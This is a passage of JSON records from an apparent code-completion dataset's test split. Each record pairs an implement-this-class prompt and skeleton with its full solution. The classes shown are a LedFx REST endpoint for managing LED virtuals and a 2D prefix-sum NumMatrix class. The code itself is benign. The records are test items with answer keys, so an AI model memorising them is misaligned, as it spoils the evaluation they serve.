{'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\ntry:\n data = await request.json()\nexcept JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\nvirtual_segments = data.get('segments')\nif virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\nold_segments = virtual.segments\ntry:\n virtual.update_segments(virtual_segments)\nexcept (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\nfor idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\nsave_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\nresponse = {'status': 'success', 'segments': virtual.segments}\nreturn web.json_response(data=response, status=200)", "virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\nvirtual.clear_effect()\ndevice_id = virtual.is_device\ndevice = self._ledfx.devices.get(device_id)\nif device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\nledfx_scenes = self._ledfx.config['scenes'].copy()\nfor scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\nself._ledfx.virtuals.destroy(virtual_id)\nself._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\nsave_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\nresponse = {'status': 'success'}\nreturn web.json_response(data=response, status=200)"], "bodies_text": "<|body_start_0|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n<|end_body_0|>\n\n<|body_start_1|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 
'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n<|end_body_1|>\n\n<|body_start_2|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n<|end_body_2|>\n\n<|body_start_3|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n<|end_body_3|>\n", "class_docstring": "REST end-point for querying and managing virtuals", "class_name": "VirtualEndpoint", "detected_licenses": 
["LGPL-2.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "GPL-3.0-only", "GPL-3.0-or-later", "LGPL-2.1-or-later", "GPL-1.0-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n <|body_0|>\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n <|body_1|>\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n <|body_2|>\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n<|end_body_0|>\n\n<|body_start_1|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n<|end_body_1|>\n\n<|body_start_2|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute 
\"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n<|end_body_2|>\n\n<|body_start_3|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000226", "length_bytes": 7327, "license_type": "permissive", "methods": [{"docstring": "Get a virtual's full config", "name": "get", "signature": "async def get(self, virtual_id) -> web.Response"}, {"docstring": "Set a virtual to active or inactive", "name": "put", "signature": "async def put(self, virtual_id, request) -> web.Response"}, {"docstring": "Update a virtual's segments configuration", "name": "post", "signature": "async def post(self, virtual_id, request) -> web.Response"}, {"docstring": "Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes", "name": "delete", "signature": "async def delete(self, virtual_id) -> web.Response"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000266", "prompt": "Implement the Python class `VirtualEndpoint` described below.\n\nClass description:\nREST end-point for querying and managing virtuals\n\nMethod signatures and docstrings:\n- async def get(self, virtual_id) -> web.Response: Get a virtual's full config\n- async def put(self, virtual_id, request) -> web.Response: Set a virtual to active or inactive\n- async def post(self, virtual_id, request) -> web.Response: Update a virtual's segments configuration\n- async def delete(self, virtual_id) -> web.Response: Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes", "prompted_full_text": 
"Implement the Python class `VirtualEndpoint` described below.\n\nClass description:\nREST end-point for querying and managing virtuals\n\nMethod signatures and docstrings:\n- async def get(self, virtual_id) -> web.Response: Get a virtual's full config\n- async def put(self, virtual_id, request) -> web.Response: Set a virtual to active or inactive\n- async def post(self, virtual_id, request) -> web.Response: Update a virtual's segments configuration\n- async def delete(self, virtual_id) -> web.Response: Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\n\n<|skeleton|>\nclass VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n <|body_0|>\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n <|body_1|>\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n <|body_2|>\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n<|end_body_0|>\n\n<|body_start_1|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n<|end_body_1|>\n\n<|body_start_2|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response 
= {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n<|end_body_2|>\n\n<|body_start_3|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n<|end_body_3|>\n", "revision_id": "3146ba9e9d10a2d01cdd4cb15ea37fc0c7bd020f", "skeleton": "<|skeleton|>\nclass VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n <|body_0|>\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n <|body_1|>\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n <|body_2|>\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n virtual = 
self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n\n async def 
delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n", "source": "the_stack_v2_python_sparse", "source_path": "ledfx/api/virtual.py", "source_repo": "THATDONFC/LedFx", "split": "test", "star_events_count": 0} {"blob_id": "c0bca80377e325119974dd30892b2c8113825103", "bodies": ["if not matrix:\n return None\nself.lsum = []\nfor i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\nself.lusum = [self.lsum[0]]\nfor i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])", "ans = 0\nans += self.lusum[row2][col2]\nif row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\nif col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\nif row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\nreturn ans"], "bodies_text": "<|body_start_0|>\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n<|end_body_0|>\n\n<|body_start_1|>\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "NumMatrix", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + 
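The `VirtualEndpoint` record above repeats one guard in both `put` and `post`: parse the request body as JSON or answer 400, then reject a missing required attribute with another 400. A minimal, framework-free sketch of that guard; the function name and return shape here are illustrative, not LedFx API:

import json
from json import JSONDecodeError

def parse_required_attr(raw_body, attr):
    # Returns (value, error); exactly one of the two is None.
    try:
        data = json.loads(raw_body)
    except JSONDecodeError:
        return None, ({'status': 'failed', 'reason': 'JSON Decoding failed'}, 400)
    value = data.get(attr)
    if value is None:
        return None, ({'status': 'failed',
                       'reason': f'Required attribute "{attr}" was not provided'}, 400)
    return value, None

# Mirrors the checks at the top of VirtualEndpoint.put
assert parse_required_attr('{"active": true}', 'active') == (True, None)
assert parse_required_attr('not json', 'active')[1][1] == 400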
matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n<|end_body_0|>\n\n<|body_start_1|>\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000227", "length_bytes": 1226, "license_type": "no_license", "methods": [{"docstring": ":type matrix: List[List[int]]", "name": "__init__", "signature": "def __init__(self, matrix)"}, {"docstring": ":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "name": "sumRegion", "signature": "def sumRegion(self, row1, col1, row2, col2)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004155", "prompt": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "prompted_full_text": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\n\n<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n<|end_body_0|>\n\n<|body_start_1|>\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n<|end_body_1|>\n", "revision_id": "8da15dce9bff72fc8b8aa75cf60bfd58f6754935", "skeleton": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NumMatrix:\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n 
